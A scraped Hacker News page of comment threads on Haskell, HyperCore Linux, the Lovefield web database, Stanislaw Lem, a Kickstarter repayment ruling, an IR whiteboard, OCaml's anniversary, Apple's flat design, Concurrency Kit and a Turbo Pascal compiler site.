I couldn't find any resources that provide a very serious introduction to optimizing Haskell code.

I found out way too late in my adventures with Haskell that Monad Transformers and similar abstractions have a significant runtime overhead and aren't free, I thought I was just playing with types that won't get in the way when the code compiles.

No one seems to cover this aspect of Haskell.

jack9 1 day ago 4 replies      
So before learning Haskell, you wished you had already known over 325 pages of what? That seems like a motivation to not try to learn it at all.
greenyoda 1 day ago 1 reply      
Readers may be interested in the extensive comments from when this article was posted in previous years:


theophrastus 1 day ago 5 replies      
syntax. of the dozen languages i've taught myself, (which is a super-set of the half dozen i've used to write significant things), Haskell's syntax has been, and remains, the largest barrier for me (and this includes perl!). For example, just a clear equivalence, like this one given by the very helpful linked article here, would've helped enormously ("sugared form" for monad):

 do { a <- f ; m } f >>= \a -> do { m }
Sometimes i think the authors of Haskell had a completely different glyph set. I'm sure some of you folks can read this like a book, but this sort of thing still throws me into the ditch:

 M2 :: (Monad m) => (a1 -> a2 -> r) -> m a1 -> m a2 -> m r

mark_l_watson 23 hours ago 1 reply      
The author covers cabal sandbox, which I used until recently when I converted my few Haskell projects to use stack. I was really happy with stack until a few days ago when I tried to add some old Haskell code to a new yesod web app. Dependency hell that took a while to sort out.

This article discussed getting everything working and then doing a cabal freeze which is something I hadn't seen before. I would like to be able to simply update a project to new library versions but maybe I should drop that desire. Any advice?

erik14th 23 hours ago 0 replies      
Would add stackage[0] as first item if it was my list.


okasaki 20 hours ago 0 replies      
I wish I hadn't bothered learning Haskell. I spent years thinking I was an idiot because I struggled and failed to make any even moderately complex programs. Now I'm using C++ and things are so much easier. I think leaving Haskell feels like leaving an abusive partner who always puts you down.
chrisra 1 day ago 0 replies      
"All of Haskell"
mijoharas 1 day ago 1 reply      
What I wish I knew now that I know Haskell: Where I can find Haskell jobs that aren't in banking! I have grown a love of the language through using it, but I don't know how to find many job positions that aren't either in banking or research.
danellis 1 day ago 1 reply      
Is he kidding with that title-text-as-an-image? I was going to C&P it into an IM, but nope.
Kenji 1 day ago 2 replies      
My desire to be productive is at odds with my appreciation for Haskell. Don't get me wrong, I love the language, it's elegant, absolutely awesome (apart from whitespaces with semantic meaning). But sometimes I feel like the language, despite its expressiveness, is like a tight straitjacket. And then I just write some JavaScript or Java or C++ or PHP and feel so much freer.
harry8 1 day ago 4 replies      
pandoc, shellcheck and xmonad.is this still the list of things you can install that were written in haskell that are used for something that isn't writing haskell code?
HyperCore Linux: A tiny portable Linux designed for reproducibility hyperos.io
184 points by jimmcslim  3 days ago   49 comments top 11
ramLlama 3 days ago 1 reply      
I like this idea, but I do not really understand who it is aimed at. The focus seems to be on reproducibility of scientific experiments and code, which is great! Many existing code artifacts are WOGSL (Works On Graduate Student's Laptop) which is the CS equivalent of "runs when parked".

So, let's break down the fields of CS for which this should be applicable:

* Systems: This won't work except for the few systems projects that are entirely in-RAM AND will work on tinycore's kernel version

* ML: This, I can see, especially with the seeming focus on dataset management. Much ML is compute-bound and the overhead of using the FUSE FS's is hopefully negligible.

So, is this focused on ML and ML-using code and experiments? If so, I think that should be clarified. I think a lot of systems folk will be (rightly or wrongly) turned away from it due to the seeming overhead of the various hyper* extensions. Not to mention that they are all written in Node/JS (Again, rightly or wrongly, many systems folk will not want to run their stuff on platforms written in JS)

I like the direction this project can go, but there seems to be a lack of focus or direction in your mission right now.

trengrj 3 days ago 1 reply      
I was hoping this was going to be a linux distro built reproducibly (as in same binary builds given same compiler toolchain) but was disappointed..
0x006A 3 days ago 1 reply      
> sudo linux boot

 /usr/local/lib/node_modules/linux/cli.js:60 fs.accessSync(keyPath) ^ TypeError: Object #<Object> has no method 'accessSync'

dingdingdang 3 days ago 2 replies      
What speed stats would people be getting with this..? The idea of Node managing a hypervisor linux VM somehow seems unrealistic in performance terms - but I might be hugely prejudiced on this so who knows.
bananaoomarang 3 days ago 4 replies      
`npm install linux`
falcolas 3 days ago 0 replies      
Seems like a competitor for Vagrant as much as anything else. Given the ubiquity of Virtualbox and portability of its images, it seems like it will be the tool most compared.

That or docker toolbox.

voltagex_ 2 days ago 1 reply      
coherentpony 2 days ago 0 replies      
Also check out NixOS if you want a bonefide linux distribution: http://nixos.org/
weavie 3 days ago 1 reply      
For the first time in quite a while I am actually tempted to update my mac to Yosemite. It isn't explicit, but I am fairly certain it won't work in older versions of osx.
0x006A 3 days ago 2 replies      
why is this using npm and not brew?
__gcmurphy 3 days ago 2 replies      
Lovefield A relational database for web apps google.github.io
198 points by dumindunuwan  3 days ago   55 comments top 15
mzarate06 3 days ago 5 replies      
From the first 1 minute and 15 seconds of the video:

> "With WebSQL being deprecated, and IndexedDB not providing structured queries, web developers need a tool to satisfy their structured query needs."

> "Web app developers need structured queries to work in the mobile world."

> "With IndexedDB ... there's a steeeep learning curve to make it useful for your app. Moreover, IndexedDB does not provide structured queries."

> "IndexedDB does not offer structured query features, such as sorting by multiple columns, or joining the results of multiple tables."

As someone that looked forward to WebSQL, this is painful to hear. Many of us realized the above from the beginning. Yet, some in the standards committee found a way to shoot down WebSQL, w/vague rationale such as "we don't feel it's the best path for the web".

Well, thank you. Instead of giving us one of the most well tested SQL implementations (SQL Lite) that addresses all of the above, and much more, we were shoved a harder to use, more verbose, and less powerful alternative (IndexedDB). And as a result, we're having to implement our own relational databases. In JavaScript. 4-5 years later.

No offense to Lovefield, but it represents everything wrong w/the decision to deprecate WebSQL and implement IndexedDB instead. It was also the single-most decision that made me lose faith in the standards committee.

sgrove 3 days ago 0 replies      
Another database which has similar characteristics (although not quite sql-like api's) that I've had a lot of luck with is https://github.com/tonsky/datascript. Bit of a tangent, but anyone looking for this kind of functionality might be interested.
jdimov9 3 days ago 5 replies      
What is a browser database and what is it good for? Would you use one instead of a back-end DB or in conjunction with one? How? Why? Why is this on 1st page - what is cool about it?

I'm clearly missing something, but I can't be bothered to watch the videos - can someone TL;DR it for me, please.

amelius 3 days ago 3 replies      
What happens when the user opens two tabs, both of which try to access the same local database?
stephen 3 days ago 1 reply      
Interesting. At first I was thinking this might be part of their cross-platform (iOS/Android/web) architecture that they use for Inbox, Sheets, and a few other things.

E.g. they assert that, despite having pure-native views (e.g. no Swing-style "one UI for all platforms"), they share ~70% of the client-side code across iOS/Android/web.

Which to me insinuates the reused code is probably things like the domain models, validation rules, and also online/offline data storage/sync logic.

E.g. maybe Lovefield was part of that cross-platform client-side storage architecture. But probably not since it's Javascript. (Which is fine, Google is a big place/lots of different apps/needs.)

rw2 3 days ago 0 replies      
This is good for people used to sql but I personally find the way that IndexDB stores data to be superior. You just have to get used to the NoSQL way of persisting objects. Making one technology look like another is never efficient for an app.
olegp 3 days ago 0 replies      
Would be interesting to compare it to AlaSQL (https://github.com/agershun/alasql).
emmanueloga_ 2 days ago 0 replies      
The api style looks very similar to JOOQ's one.

1: http://www.jooq.org/doc/3.6/manual/sql-building/sql-statemen...

jpgvm 2 days ago 0 replies      
The whole saga is very sad. WebSQL was the right move all along. NoSQL turned out to be a fad and people really just want to use SQL to build real apps.Especially newbies, learning SQL is a lot easier than learning how to reimplement it's features on top of a document store.
dom96 3 days ago 0 replies      
Lovefield is still relatively new and immature. When I tried to use it I ran into some strange errors. The situation might have improved now but I personally would still recommend PouchDB instead.
nnq 3 days ago 0 replies      
Niiice... last time I tried to get something done with IndexedDB it was total pita. If this manages to take away even 20% of IndexedDB's pain, it's sure worth taking a look at!
wener 3 days ago 1 reply      
I'm not a web developer, but this looks great, I want to learn how SQL things work, maybe this is a good start for beginner ?BTW, speaker's face is too serious.
dvh 3 days ago 1 reply      
Then why did they killed websql in chrome packaged apps?
pvaldes 2 days ago 0 replies      
wow, the landing page of this web is really fast...
moron4hire 3 days ago 0 replies      
Why Stanislaw Lems futurism deserves attention nautil.us
192 points by pmcpinto  3 days ago   64 comments top 14
Pamar 3 days ago 1 reply      
The result is a disconcerting paradox, which Lem expresses early in the book: To maintain control of our own fate, we must yield ouragency to minds exponentially more powerful than our own, created through processes we cannot entirely understand, and hence potentially unknowable to us.

This sentence (and the ones that precede and culminate in this one) made me think of Ian Bank's Culture.

terhechte 3 days ago 4 replies      
Interestingly, in his book 'Golem XIV' [1] Lem creates an actual example scenario of a future where mankind managed to create an AI far superior to us only to find that said AI is not even remotely interested in playing war games for military generals and instead just holds long lectures about humanity. So it is a bit like a simplified, more approachable, version of the 'Summa Technologise' mentioned in the article. I recommend that book; it is a great read.

[1] https://en.wikipedia.org/wiki/Golem_XIV

chiph 3 days ago 1 reply      
I think we'll be fine, as long as we don't build a machine that can create anything as long as it starts with the letter 'N'

Reference: https://books.google.com/books?id=kWElP9YZkzQC&pg=PA3&lpg=PA...

pjscott 3 days ago 1 reply      
How useful would a superintelligent computer be if it was submerged by storm surges from rising seas or dis- connected from a steady supply of electricity?

How useful would Elon Musk be if he were submerged by storm surges from rising seas or disconnected from a steady supply of food?

Put that way, the question sounds pretty silly: he's rich enough to buy food even if it gets expensive, and if the ocean ever got too frisky he would simply avoid standing next to it. Any superintelligent AI worthy of its lofty title could get a lot of cash; mere humans manage that sort of thing all the time. Why even mention such minor inconveniences?

ommunist 3 days ago 2 replies      
Stanislaw Lem imho is one of the most accurate futurologists. Drone armies, spaceflight psychological problems, he had that all, and his Futurological Congress is also hilarious.
maligree 3 days ago 1 reply      
There's also a fantastic 7-minute film based on the dark wisdom of Golem XIV. You should really, really watch it:


beatpanda 3 days ago 2 replies      
More than once I have wondered why so many high technologists are more concerned by as- yet-nonexistent threats than the much more mundane and all-too-real ones literally right before their eyes.

Yeah, for a group of people who hold themselves out to be so very intelligent there does seem to be a blind spot about ten miles wide.

And before you say it, you're going to have to provide some proof of the oft-repeated notion that goes something like "Uber-for-dogwalkers is going to accidentally provide the solution to climate change." Simply believing so isn't enough.

sjclemmy 2 days ago 1 reply      
What appears to be the central theme of this article is the idea of transformation, which is an idea as old as the human species.

It seems to me that central to our psyche is a desire to transcend our current existence and replace it with a new one. This idea is expressed all over the place in our cultures; reincarnation, living in space, life after death, or, on a more mundane level 'bettering oneself' through personal transformation. The author says that Lem was 'seduced' by this idea and expressed it as the notion of 'indomitable human spirit'. It is indeed a terribly seductive idea, not least because of the effect it has on how we feel.

paddyzab 2 days ago 1 reply      
There is one book by Lem, one of my favourite which was never translated to English.https://en.wikipedia.org/wiki/Observation_on_the_Spot

In which he describes a variant of reality where civilisation, engineers a security sphere on reality (called etykosfera - sphere of ethics, with nanobots called Bystry), which prevents beings from hurting them selfs in anyway.

He explores social consequences of such security layer.

Amazing book.

alex_young 3 days ago 3 replies      
Sadly unmentioned is Lem's quite distopion post-apocoliptic work, "Memoirs Found in a Bathtub", a future defined by mega-McCarthyism and the pursuit of any fragment of 'truth' however slimly defined that may be.

Worth a read.

forscha 2 days ago 0 replies      
I wonder what the author of the article could do if he 1) got into the habit of keeping it concise 2) used 2-syllable words instead of 5-syllable words when reasonable.

With the rise of the web and a less-empty life than I once had, I don't have the patience to work through verbiage for uncertain payoff, even when the topic is a book that I'm already aware of and looking forward to reading.

ajuc 2 days ago 0 replies      
Lem was the most obviously brilliant author that I've read.

I still can't manage some of his serious books (Solaris was OK, but Fiasco was too boring for me). But the Cyberiada is just too great.

I've tried reading Summa Technologiae when I was a teen, and dismissed it as I dismissed all philosophy at the time, should probably try again.

novalis78 3 days ago 0 replies      
Lem's language is so very powerful - some of the vivid imagery of his books (which I read as a young teenager) still haunts me to this day. Especially his ability to depict "alien" worlds/concepts that seem so close on the one hand but then continuously elude deeper comprehension and leave you wondering and in awe.
acconrad 3 days ago 1 reply      
The title made me think this was going to be about TAOCP or Godel Escher Bach.
State court orders Kickstarted game creator to pay $54k for failing to deliver gamasutra.com
155 points by Impossible  2 days ago   94 comments top 12
ghayes 2 days ago 4 replies      
There are risks involved in a Kickstarter. I'm sure these are spelled out in the terms and conditions in funding a Kickstarter. While fraud should be protected, a good-hearted attempt that fails should be covered by that contract, in my opinion.
seesomesense 2 days ago 0 replies      
Asylum Playing Cards were a long running scam.Good to see that the Attorney General's office finally went after them.
equil 2 days ago 1 reply      
ever since that hanfree story [0], Kickstarter has been a bit more explicit about creator obligations [1]. Creators are now told to "make every reasonable effort to find another way of bringing the project to the best possible conclusion for backers" should the project fail or rewards not make it to backers. The terms of use also has an explicit warning about possible legal action at the bottom.

[0] http://www.businessinsider.com/how-one-stupid-mistake-and-35...

[1] https://www.kickstarter.com/terms-of-use#backer-creator

746F7475 1 day ago 1 reply      
It was only a matter of time something like this happened. In best case there will be less bad Kickstarters and scams, in worst case kickstarting will become a thing of the past. Unless you are 100% sure you can deliver the product you risk having to pay back everything.
hathym 1 day ago 0 replies      
All they need is another kickstarter compain to pay for the legal fees :D
joesmo 1 day ago 0 replies      
Always set up an LLC or Corporation before doing any kind of business that could involve such liabilities. The $500-$1000 it costs to do that is obviously well spent money, but most people don't realize that till they're facing bankruptcy. Think of it like health insurance for your business: if you don't have it and something goes wrong, you're fucked. Then again, lots of people who could afford to pay skimp on health insurance and put themselves at risk of bankruptcy every single day, so it does take a little bit of awareness of reality.
bentrevor 2 days ago 2 replies      
Does double jeopardy apply here? As in, can another state sue for the same thing?
fapjacks 1 day ago 0 replies      
AWESOME. Awesome! That's all I can say. I'm SO glad to see this happen. It will go a long way to reassure nervous backers to back interesting projects and to stop thieves and scammers like the hilariously-fake Bleen[0].

[0]: https://www.indiegogo.com/projects/bleen-3d-without-glasses

javajosh 2 days ago 7 replies      
Cacti 1 day ago 2 replies      
smegel 2 days ago 0 replies      
gadrfgaesgysd 2 days ago 9 replies      
Dry erase board lined with IR sensors to record pen strokes [video] youtube.com
195 points by arey_abhishek  2 days ago   64 comments top 21
jwcacces 2 days ago 2 replies      
My high school had these in 1995. Each marker color had a different reflective pattern on a band around the tip so the scanning laser could read it like a bar code. I remember the eraser having a solid reflective band all the way around. It was pretty cool, as we all got whiteboard "transcripts" emailed to us at the end of the class that you could play back / pause / rewind / etc... whenever you wanted.

Also, these boards had no projectors (they used real ink in the markers) and didn't require special markers (just the barcoded pen collars, which were removable)

arey_abhishek 2 days ago 2 replies      
OP here. If you'd like to see a kickstarter project out of this, please upvote this comment!
natch 1 day ago 1 reply      
Please don't listen to all the naysayers (I was about to be one of them) who are saying this has "already been done." Sure, they are right. But is there one in every room of every office? No. But there could be.

The thing that has changed between back then when this stuff was first done and now, is that everybody has smartphones. The old dinosaur systems aren't priced to take this into account.

tsangk 2 days ago 2 replies      
If you are interested in a full commercial version of this (sharing an analog whiteboard with a link), check out http://smartkapp.com

(Disclosure: Am employee of said company)

raldi 2 days ago 2 replies      
This is cool as a DIY project, but digital whiteboards have been around since at least 1991:https://en.wikipedia.org/wiki/Smart_Board
joezydeco 2 days ago 1 reply      
One tip from someone that has worked with IR emitters/detectors: make sure your product can handle direct and reflected sunlight.

I'd hate to see you getting all the way through a kickstarter and then finding out you need to rework your frame to reject ambient and stray IR.

liamuk 1 day ago 1 reply      
Here's a poor man's version that uses <$50 of hardware (a wii remote and an ir led)

If anyone's interested in playing around with it I'll put up some nicer usage instructions



27182818284 2 days ago 1 reply      
Fairly neat. Consider the listing status of the video. Right now it is discouraging people from sharing.
OliverJones 1 day ago 1 reply      
Virtual Ink, anyone? http://www.mimio.com/en-NA.aspx Think about how much fun it will be to try to sell expensive stuff to schools and colleges before you raise a lot of money for this.
deutronium 1 day ago 0 replies      
Out of interest, I was looking at one of the IR touchscreen frames you linked to.

The control boards seem to vary in terms of the number of touch points they can monitor.

So I'm wondering how you distinguish between a marker pen and the larger whiteboard eraser.

Is it possible to access the raw output from the IR sensors I wonder.

langseth 2 days ago 1 reply      
Is this working on a similar system to Optical touchscreen technology? Did you build the ir sensors into the edge of the glass or at the surface?


Milner08 1 day ago 0 replies      
I remember my dad having something very similar in his office when I was a kid. You could write on it like a normal white board then it would print out a copy of it for you.
ohitsdom 2 days ago 2 replies      
Really impressive. Must be pretty sensitive IR sensors to not have false detections when the marker/eraser gets close to the board but doesn't touch it. Any info on the hardware and software stack?
bobosha 2 days ago 2 replies      
couldn't we have a webcam to stream/record the video? or perhaps capture snapshots? If needed we might subtract the human from the video stream using some basic machine vision techniques.
MichaelApproved 2 days ago 0 replies      
Looked like it was zoomed in on the written part. I wonder if it would gradually zoom out, as you write more, or if you could scroll around on the display to see the rest of the writing.
smurlidhar 2 days ago 0 replies      
Hey arey_abhishek I am an investor and have been looking to invest in a product like this! Let's talk! DM me @sidsays on Twitter.
hoopism 2 days ago 0 replies      
Very cool DIY project.

Without details of price or advantage over existing tech I don't see it as a fundable/kickstartable effort... but good luck.

mmastrac 2 days ago 0 replies      
Impressive. What platform did you build this on?
DiabloD3 2 days ago 0 replies      
gotrythis 2 days ago 0 replies      
I want one. Seems like you're saying we can't buy it currently?
skynetv2 2 days ago 2 replies      
OCaml's 20th Anniversary inria.fr
163 points by amirmc  1 day ago   31 comments top 4
fermigier 1 day ago 1 reply      
Congratulations to my friends Xavier Leroy and Damien Doligez, as well as to all the other contributors to OCaml.

For those interested in learning OCaml from a MOOC, there is one starting soon (next month). You can already register here: https://www.france-universite-numerique-mooc.fr/courses/pari...

Note: the MOOC is delivered on a French MOOC platform but will be in english.

eatonphil 1 day ago 4 replies      
I got really excited reading the 1995 email as an announcement that INRIA was releasing a new SML-based language. The association I can't get out of my head is: SML is to C as OCaml is to C++. This is backed (to some degree) even in this email:

 > ... in 20 years, the language picked up many language features that were open research problems in 1995, such as objects and classes with type inference, polymorphic variants, first-class polymorphism, and first-class modules.
SML is a much simpler language and I think a solid SML kernel with a good (read: modern, web-friendly) standard library targeting LLVM or the JVM could be a real winner for commercial use.

xvilka 1 day ago 0 replies      
One of the biggest problems now is the lack of the Windows support for Opam[1].

I hope that will be solved in the near future. Because currently Microsoft trying to take the niche with their F#.

[1] https://github.com/ocaml/opam/issues/246

quantumtremor 1 day ago 5 replies      
I know Clojure, looking to learn a statically typed functional language. Narrowed it down to Haskell and OCaml (are there others I should know about?).

I still am unsure what OCaml is good for. Ex., Ruby is good for webdev with Rails, Python is good as a general purpose language, Clojure is good for async and quick iteration/integrating with Java code, C is good for OS work, C++ is good for native applications.

Is OCaml general purpose? Can I use it for NLP? Statistics? Numpy-like n-d array math? Writing a compiler?

Destroying Apples Legacy cheerfulsw.com
183 points by milen  2 days ago   130 comments top 26
epistasis 2 days ago 10 replies      
I have found the flat design incredibly difficult to use.

In particular, the new Apple Music app was almost completely undiscoverable for me. It wasn't until I was reading patch notes that I realized that it had a key feature that I had been searching the UI for more than a month. That feature was to show only the music available offline, and it's hidden behind a down arrow next to a heading label. (Rather than the ... that other menus have).

Apple has never been perfect at UIs, but they've always been better than this in my experience. Deciding to hide key information and be as cryptic as possible works great for designers that already know the UI, but it works terribly for users that are still learning it. This type of elementary mistake, all too common by those who are deep in the act of creation, is best corrected by stepping back from the problem and approaching everything with the mind of a beginner. That or giving the device to an outsider and observing them, good old fashioned trials.

That's what UX needs these days, not more fashionistas trying to remove data and UI cues. The industry needs a big wakeup call. Mobile and even the web (like Google Docs) are becoming a churn of bad experience.

matthewmacleod 2 days ago 2 replies      
Bit over-the-top I think, with some misleading statements.

Apple still publish the HIG. See the iOS version here: https://developer.apple.com/library/ios/documentation/UserEx...

Contrary to what the article says, it does explain why various UI elements are designed as they are not just thoughtless promotion of aesthetics over interaction.

I think people often fall back on 'nobody thought about this and it's rubbish' arguments when the reality is often closer to 'they changed this and I don't like it' the latter is a totally valid complaint, but it's also qualitatively different.

In my personal experience, I've not seen computer-nave users of iOS struggle to a greater degree with iOS 7+ than with any of the previous versions. YMMV of course, but I think the extent to which it's a problem is overstated.

There are a couple of exceptions, of course the reminders app has some stupid UI decisions that irritate me. But what software doesn't? How about that floating 'create a new document' button that was in Google Docs/Sheets/etc. until recently? Every single time I opened it, I had to hunt around for the button to create a new document because it wasn't where I expected it to be. But that doesn't mean Material is awful it just means that it's a complex, long-term challenge to create a consistent UI applicable to a wide variety of applications. And I don't think modern UX is all that bad.

astrodust 2 days ago 3 replies      
"Apple used to lead the world in interface design" does not mean their designs were without serious flaws. Nobody would get up and defend System 7 as the pinnacle of usability, it was downright quirky and strange in places, and by the time System 9 arrived it'd gotten downright surreal. Things only made sense in the context of history.

The difference between Apple and other companies is not that Apple gets it right every time, but that Apple genuinely tries. Some other companies literally do not care how their products look, they just ship whatever the engineering team cobbles together with snippets from from Google Image Search.

Microsoft's making similar efforts lately, so that's encouraging to see, and even Google is making strides in reducing the amount of rampant ugly in their applications.

gok 2 days ago 2 replies      
The leading complaints about the "Edit Alarm" screen is kinda weird...unless "Apples new direction" means Apple's new direction post-2006.

The new: https://unicornfree.com/wp-content/uploads/2015/09/IMG_7374....The old: http://i1-news.softpedia-static.com/images/news2/Apple-iOS-S...

There was always a "time-wasting dial." The labels were always "styled with more visual impact than the actual data." All four different types of data elements were always "styled the same, with the same visual weight."

Pxtl 2 days ago 2 replies      
Imho, the problem is that flat design is intensely restrictive. Suddenly things that used to be available to freely design with have become UI cues... the designer can no longer play with color and layout and let the buttons stand out by button-bevel and the like... now the color and layout are part of the UI language.

Apple, being a design-oriented company, can't keep fiddling with individual app layouts, which means they can't work within the hyper-restrictive design language of flat.

Microsoft actually does much better with flat, I find, because I think there are less cooks in the "design" kitchen there.

guelo 2 days ago 1 reply      
I've had conclusive data that a 3D-looking button was converting significantly better but have been overruled because of the "sleek", "clean" bullshit that passes for design these days.
akamaka 2 days ago 1 reply      
It's funny to read this, because I personally find iOS to have by far the best UI of any mobile OS, and I consider the flat design of iOS7 to be a big step forward.

Other people feel differently, and they consider Android superior, so clearly there is a difference in taste.

The conundrum is that nobody seems to be able to clearly articulate why this is, and this article doesn't really help. For example, it says the timepicker is "awkward, time-wasting, inaccurate". Compared to what? Has anyone been able to measure how much time it wastes and how innaccurate it is?

In the end, this article takes a thousand words to say little more than "This doesn't feel quite right to me", and doesn't reveal any root causes. Do people prefer different UIs because of differences in finger size, manual dexerity, visual attention? Does Apple's UI cater to a specific minority of users? Do biological differences make it impossible to satisfy everyone?

kps 2 days ago 0 replies      

 > Minimalism in software is achieved by simplifying feature sets, > not stripping away pixels.

Simplifying feature sets should not mean reducing functionality. That is the lazy way. Simplicity should remove the extraneous, redundant, and inefficient; functionality is not that. Functionality with simplicity requires things generality, orthogonality, composability....

Good software engineers eventually learn to be able to do this for the code they produce (whether the business case allows it is a separate question). It should be possible for good UI designers to do likewise.


Edit: I am not disagreeing with the article author here:

 > Its not minimalism to rip away the very things your users need.

hyperion2010 2 days ago 1 reply      
A lingering question of mine: "Has anyone _actually_ done UI research since the 70s or are all these 'innovations' just bullshit?"
nemo44x 2 days ago 0 replies      
Not that Apple has perfect UI's (The clock dial is awful) but I feel like the ideas expressed in this article are that a UI should be designed as if the user is always using it for the first time. And that simply isn't true. With such a small screen a lot of things need to be considered, such as how easy is it to press a button without moving the hand and if this means sacrificing some natural ease of use - so be it. The user will still quickly learn how the UI works and adapt quickly.
kitsunesoba 1 day ago 0 replies      
While the old iOS look was getting a little cheesy by the time iOS 6 rolled around, it was indeed very clear for the most part. Wooden bookshelves in iBooks might not have had much function, but the shading and glassy look on controls certainly did.

As an example, coming from the angle of an individual who'd never approached a smartphone in his life, the function of the iOS 6 picker/spinner was immediately obvious. The shading and glassy highlights made it look like a real spinner and practically begged the user to interact with it. Distinct section separators made it perfectly clear that each section can be spun separately.

Compare this to the picker in iOS 7 and up. Not only is there no shading or highlights to suggest how to interact with it, but now there are no separators even if one presumes that it can be spun, it looks like the whole thing would spin. To make things worse, oddly skeumorphic 3D perspective has been added into the mix, presumably to try to suggest spinnability, but without partner cues it's just confusing. With this design, so much is left unknown until the user attempts interaction.

Reference screenshot:http://blog.ittybittyapps.com/images/posts/lifting-the-lid-o...

I personally feel that Apple struck a nice balance between design modesty, usability, and aesthetics with Mavericks desktop, but that's gone with Yosemite. Interestingly though, El Capitan adds in subtle hints of shading and depth in a few places. I wonder if we'll see things start to tilt back in the other direction with OS X 10.12 and iOS 10.

lips 2 days ago 0 replies      
Here's a secret. Apple has never designed truly wonderful user interaction. But they have been unafraid to say "no," less horrible than most others, and opinionated. These discussions don't benefit from a false narrative of them falling from a grace they never held. (Mac owner from plus to pad)
Shivetya 2 days ago 0 replies      
the dramatic loss of color and warmth when the new look came about took me back to the days when I had a PS/2 50z with the VGA gray scale monitor. While everything can look well defined it does at times look a little too stark; if software could have a dystopian air to it compared to what came before they did well.
rsp1984 2 days ago 1 reply      
I could not agree more with this article. Human brains are hard-wired to infer 3D structure from shading. Taking away shading means taking away 3D structure, means taking away one of the most important visual cues there is to help humans grasp interfaces.

Also, coming from all the print media, human brains are conditioned to detect and separate important/immediate from un-important/less immediate content by looking at overall page structure and relative weights. Deciding against bold or large fonts for the looks takes that away too.

Finally there is a ton of research pointing to the fact that fonts with a healthy amount of thickness is more easy to read than thin fonts. The debate is still on about serifed fonts I guess but using Light Helvetica for kind of everything quite certainly is a step in the wrong direction.

Bartweiss 2 days ago 2 replies      
At this point, a lot of decisions that were once skeuomorphic are now a matter of tradition and user expectation. For a whole generation, the image of a floppy means "save" not because of it's physical history but because that's the icon everyone else uses for "save".

Abandoning choices like "button means clickable" and "colored and underlined means link" isn't just a move to flat design, it's an attempt to retrain users on software conventions that have transcended their physical origins.

ovatsug25 2 days ago 0 replies      
My company does a lot of paperwork. It turns out people want to work on something that looks like "paper" or the final printed out result. The idea of an interface with buttons may be commonplace to us, but there are many people for whom this is equally impossible.
DasIch 2 days ago 0 replies      
> There was never any evidence that a few decorative pixels hurt the user.

Is there any evidence that removing them does?

> The HIG wasnt about aesthetics, it was about interaction.

> It was based on research, not trends.

It's not about interaction now? It's not about research now? In which ways isn't it?

I believe skeumorphism is just about aesthetics and trends. Well, actually I don't, I'm not sure what I should think I'm not aware of any research and can't make a good argument either way. Unlike the author I don't pretend I can though.

There might be a problem, it might just be a figment of the authors imagination. In either case articles like this one certainly are a problem.

zeveb 2 days ago 1 reply      
Great, and true, articlebut interestingly, he's guilty of a similar thing: his CSS makes it impossible to tell visited vs. never-visited links.
amelius 2 days ago 7 replies      
> ... has produced some of the best industrial design in the history of consumer products.

Like the completely non-ergonomic, design-over-function, keyboards?

devy 2 days ago 0 replies      
"so apple legal call was not a threat. it was a request. b.c. jony ive was personally offended by our soundboard. what world do i live in?"[1] - by the author Amy Hoy

[1]: https://twitter.com/amyhoy/status/642446087802982400

draw_down 2 days ago 0 replies      
Yes, they are doomed. Doomed!!
joesmo 2 days ago 0 replies      
Once a UI design is perfected, as is the case often, companies continue to look for ways to change it simply for the sake of changing it and so they can announce something new. This is true of both Apple and Google in the mobile phone space. Every single time, the new UI is worse because it hasn't been tested and no designer can think of everything. There was nothing wrong with UIs before the flat design. Flat design didn't solve anything. But once Apple implemented it, everyone had to have it. If you don't have it, your app is not "slick" and "cool." And yes, those subjective qualities matter way more than the quality of your app or really, anything else.
Silhouette 2 days ago 0 replies      
Oh, man, I have never wished so much that I could upvote a submission more than once. I wish this article could be pinned at the top of every discussion site used by web and app designers for the next... forever.

The only thing in the design world that I find more infuriating than the current trends, and the accompanying blandness and usability issues, is when people try to justify those trends as being somehow superior to what we had before using the worst kind of retro-fitted mumbo jumbo. At least let's be honest that most places have adopted flat design because it's cheap, easy, and quick.

At the bottom end of the market, making UIs a commodity is in itself no bad thing. For web applications, you can implement flat design in pure CSS, cutting down the bandwidth required for images. More generally, typical flat design elements are nicely scalable and Retina-ready, because everything is all done with such trivial vector graphics that no real effort or creativity is needed. You can adapt the simple layouts more easily to small screens as well. In fact, why develop anything original or even hire anyone with design skills at all, when you can just slap Bootstrap on it and charge the client an extra 200% for making the site responsive?

Unfortunately, for anything above the bottom end of the market, and particularly for promoting UIs that offer better usability and/or more distinctive styles, the current trends are awful for all the reasons this article sets out.

happyscrappy 2 days ago 4 replies      
Not that Google has a legacy of great design, but don't all these points apply to Material as well?
gress 2 days ago 0 replies      
The author wasn't around when MacOS was new, otherwise she'd remember that the things she thinks are obvious are just conventions that people had to learn. Easier than a CLI, but something to learn just the same.
vinceguidry 2 days ago 1 reply      
Concurrency kit Concurrency primitives and non-blocking data structures in C concurrencykit.org
137 points by misframer  1 day ago   15 comments top 6
reza_n 10 hours ago 1 reply      
It seems like a lot of these data structs are not thread safe. Other than ck_bitmap which seems to be read/write thread safe, ck_array, ck_hs, ck_ht, and parts of ck_ring only allow a single writer in the presence of many readers. Did I misread something here? Still a lot of good stuff here, but not sure if these data structures can be used without external locking.
virmundi 1 day ago 3 replies      
How does this compare to omp? It just started learning about this in my HTC course.
mingodad 16 hours ago 0 replies      
I looked at this library in the past and I could not find any usage of it in any open source project. That made me a bit scary, how a library like this with the supposed well thought construction is not used anywhere ?
Jweb_Guru 1 day ago 0 replies      
I have nothing but praise for this library... it's a great resource for writing high-performance parallel programs.
Keyframe 23 hours ago 1 reply      
OK, but where do I start?

PS I may be dense today.

gadrfgaesgysd 1 day ago 3 replies      
Internals of a Turbo Pascal Compiler turbopascal.org
134 points by agumonkey  2 days ago   104 comments top 8
barrkel 2 days ago 6 replies      
This site doesn't describe the internals of Borland's Turbo Pascal compiler. It describes a compiler written in Turbo Pascal that can compile some subset of Turbo Pascal's language.

Borland's Turbo Pascal compiler was written in 16-bit x86 assembly, mostly by Anders Hejlsberg.

There is an explanation of this on the front page of the site, but it's not clear from the headline.

(I used to work at Borland on the Delphi compiler, and had access to the source of tpc.exe.)

pjmlp 2 days ago 3 replies      
I loved Turbo Pascal.

When I got to learn C, already had Turbo Pascal 3, 4, 5.5 and 6.0 on my toolbox.

Compared with Turbo Pascal, the only thing C had going for it was being available in other systems. Everything else was meh.

No memory safe handling, no bounds checking, no units (modules), no namespacing, no proper strings, no OOP support, arrays decaying into pointers, no type safe enumerations, no sets, no generic array indexes...

At least C++ allowed me to get some of those Turbo Pascal features back.

Udo 2 days ago 1 reply      
